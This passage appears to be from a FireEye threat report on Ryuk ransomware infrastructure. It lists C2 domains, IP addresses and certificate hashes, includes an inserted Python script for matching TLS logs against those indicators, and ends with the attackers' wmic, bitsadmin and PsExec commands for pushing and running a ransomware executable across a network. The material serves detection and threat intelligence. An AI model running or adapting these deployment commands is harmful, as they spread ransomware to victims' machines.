C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com
|
5f6fa19ffe5735ff81b0e7981a864dc8
10/23/20
|
45.147.231.222:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com
|
ff54a7e6f51a850ef1d744d06d8e6caa
10/23/20
|
45.153.241.141:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com
|
4cda9d0bece4f6156a80967298455bd5
10/26/20
|
74.118.138.139:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com
|
e317485d700bf5e8cb8eea1ec6a72a1a
10/26/20
|
108.62.12.12:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com
|
e0022cbf0dd5aa597fee73e79d2b5023
10/26/20
|
108.62.12.121:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com
|
44e7347a522b22cdf5de658a4237ce58
10/26/20
|
172.241.27.65:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com
|
cd3e51ee538610879d6fa77fa281bc6f
10/26/20
|
172.241.27.68:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com
|
04b6aec529b3656040a68e17afdabfa4
10/26/20
|
172.241.27.70:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com
|
200c25c2b93203392e1acf5d975d6544
10/26/20
|
45.153.241.139:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com
|
9d7c52c79f3825baf97d1318bae3ebe2
10/27/20
|
45.153.241.14:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com
|
5bae28b0d0e969af2c0eda21abe91f35
10/28/20
|
190.211.254.154:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com
|
a1e62e7e547532831d0dd07832f61f54
10/28/20
|
81.17.28.70:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com
|
67c7c75d396988ba7d6cd36f35def3e4
10/28/20
|
81.17.28.105:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com
|
880e59b44e7175e62d75128accedb221
10/28/20
|
179.43.160.205:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com
|
cdea09a43bef7f1679e9cd1bbeb4b657
10/28/20
|
179.43.158.171:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com
|
512c6e39bf03a4240f5a2d32ee710ce5
10/28/20
|
179.43.133.44:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com
|
87f3698c743f8a1296babf9fbebafa9f
10/28/20
|
179.43.128.5:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com
|
6df66077378c5943453b36bd3a1ed105
10/28/20
|
179.43.128.3:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com
|
9706fd787a32a7e94915f91124de3ad3
10/28/20
|
81.17.28.122:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com
|
0e1b0266de2b5eaf427f5915086b4d7c
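Indicator rows like the ones above only pay off once they are matched against what the network actually saw. The script below is an added example, not code from the FireEye report: it parses a few rows copied verbatim from the table in the same `date | ip:port | subject | hash` layout, refangs the `[.]` notation, and checks constructed TLS observations against them three ways (certificate hash, C2 endpoint, certificate CN). It also raises a lower-confidence "suspect" verdict for any certificate whose subject repeats the `C=US,ST=TX,L=Texas,O=lol` filler that nearly every listed certificate shares; that heuristic is my generalization from the table, not a claim the report makes. Two assumptions are labelled in the code: the hash column is treated as the MD5 of the served certificate, and the log record shape (`dst`, `port`, `subject`, `md5`) is a constructed simplification of what a TLS or x509 log would carry.

```python
"""Match observed TLS sessions against the C2 certificate indicators listed above.

Added example, not code from the FireEye report. Assumptions (labelled):
- indicator rows use the report's "date | ip:port | subject | hash" layout;
- the hash column is treated as the MD5 of the served certificate;
- the TLS observations below are constructed, in a simplified log shape.
"""
from dataclasses import dataclass

# Constructed input: three rows copied verbatim from the indicator table above.
# A real deployment would load the complete table instead.
INDICATOR_ROWS = """
9/22/20 | 69.61.38.155:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com | d37ba4a4b1885e96ff54d1f139bf3f47
10/7/20 | 69.61.38.132:443 | C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com | e6e80f6eb5cbfc73cde40819007dcc53
10/28/20 | 81.17.28.122:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com | 0e1b0266de2b5eaf427f5915086b4d7c
"""

# Constructed TLS observations (hypothetical log shape: dst, port, cert subject, cert MD5).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges, not real hosts.
SAMPLE_TLS_LOG = [
    {"dst": "69.61.38.155", "port": 443,
     "subject": "C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer.com",
     "md5": "d37ba4a4b1885e96ff54d1f139bf3f47"},
    {"dst": "203.0.113.10", "port": 443,
     "subject": "C=US,ST=TX,L=Texas,O=lol,OU=,CN=not-yet-listed.example",
     "md5": "00000000000000000000000000000000"},
    {"dst": "198.51.100.7", "port": 443,
     "subject": "CN=www.example.com,O=Example Corp,L=Seattle,ST=WA,C=US",
     "md5": "11111111111111111111111111111111"},
]

# Subject attributes shared by nearly every certificate in the table; used as a
# lower-confidence heuristic for CNs that are not listed yet.
TEMPLATE_ATTRS = {"C": "US", "ST": "TX", "L": "Texas", "O": "lol"}


@dataclass
class Indicator:
    date: str
    ip: str
    port: int
    subject: dict   # parsed RDNs, e.g. {"C": "US", ..., "CN": "gtrsqer.com"}
    md5: str


def refang(value: str) -> str:
    """Undo the report's defanging so indicators compare equal to live data."""
    return value.replace("[.]", ".")


def parse_subject(subject: str) -> dict:
    """Split 'C=US,ST=TX,...,CN=host' into a dict; empty values such as OU= are kept."""
    attrs = {}
    for part in subject.split(","):
        key, sep, val = part.partition("=")
        if sep:
            attrs[key.strip()] = refang(val.strip())
    return attrs


def parse_indicator_rows(text: str) -> list:
    """Parse pipe-separated indicator rows; malformed rows are skipped, not guessed at."""
    indicators = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 4:
            continue
        date, endpoint, subject, md5 = cells
        host, _, port = endpoint.rpartition(":")
        indicators.append(Indicator(date, host, int(port), parse_subject(subject), md5.lower()))
    return indicators


def classify(obs: dict, indicators: list) -> tuple:
    """Return (verdict, reason); exact indicator hits outrank the template heuristic."""
    subj = parse_subject(obs["subject"])
    for ind in indicators:
        if obs["md5"].lower() == ind.md5:
            return "match", f"certificate MD5 {ind.md5} (listed {ind.date})"
        if obs["dst"] == ind.ip and obs["port"] == ind.port:
            return "match", f"endpoint {ind.ip}:{ind.port} (listed {ind.date})"
        if subj.get("CN") and subj.get("CN") == ind.subject.get("CN"):
            return "match", f"certificate CN {ind.subject['CN']} (listed {ind.date})"
    if all(subj.get(k) == v for k, v in TEMPLATE_ATTRS.items()):
        return "suspect", "unlisted CN under the C=US,ST=TX,L=Texas,O=lol subject template"
    return "clean", ""


def scan(log: list, indicators: list) -> list:
    """Classify every observation; returns (dst, verdict, reason) triples."""
    return [(obs["dst"],) + classify(obs, indicators) for obs in log]


if __name__ == "__main__":
    for dst, verdict, reason in scan(SAMPLE_TLS_LOG, parse_indicator_rows(INDICATOR_ROWS)):
        print(f"{dst:16} {verdict:8} {reason}")
```

Matching on three independent fields matters because the table shows the same CN and IP being reused across dates with different hashes (for example service-leader[.]com on 10/14/20 twice), so a feed that keys on hash alone would miss re-issued certificates, while the endpoint and CN checks still fire.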
RYUK Commands
start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"
start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"
start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe
FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.
Platform | Signature Name
---|---
Endpoint Security |
Network Security and Email Security |